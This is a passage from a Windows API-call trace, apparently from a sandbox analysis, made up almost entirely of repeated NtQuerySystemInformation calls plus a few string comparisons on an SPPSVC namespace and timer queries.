ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x20, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0280.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x20, ResultLength=0x0) [0280.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0280.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0280.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x50, ResultLength=0x0) [0280.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x20, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.963] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc18, Length=0x50, ResultLength=0x0) [0280.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0280.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0280.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9e0, Length=0x28, ResultLength=0x0) [0280.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0280.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0280.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x38, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9c0, Length=0x20, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcea0, Length=0x28, ResultLength=0x0) [0280.973] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0280.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0280.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd90, Length=0x28, ResultLength=0x0) [0280.974] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x50, ResultLength=0x0) [0280.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0280.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x28, ResultLength=0x0) [0280.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0280.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x28, ResultLength=0x0) [0280.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc60, Length=0x28, ResultLength=0x0) [0280.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x20, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x20, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x20, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x20, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x38, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x20, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0280.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.985] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fce70 | out: lpSystemTimeAsFileTime=0xf7a68fce70*(dwLowDateTime=0x39d92e24, dwHighDateTime=0x1d63874)) [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf28, Length=0x50, ResultLength=0x0) [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x28, ResultLength=0x0) [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd78, Length=0x50, ResultLength=0x0) [0280.985] GetTickCount () returned 0x118659d [0280.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc48, Length=0x58, ResultLength=0x0) [0280.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x28, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x28, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x38, ResultLength=0x0) [0280.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.991] NtQuerySystemInformation (SystemInformationClass=0xb9, 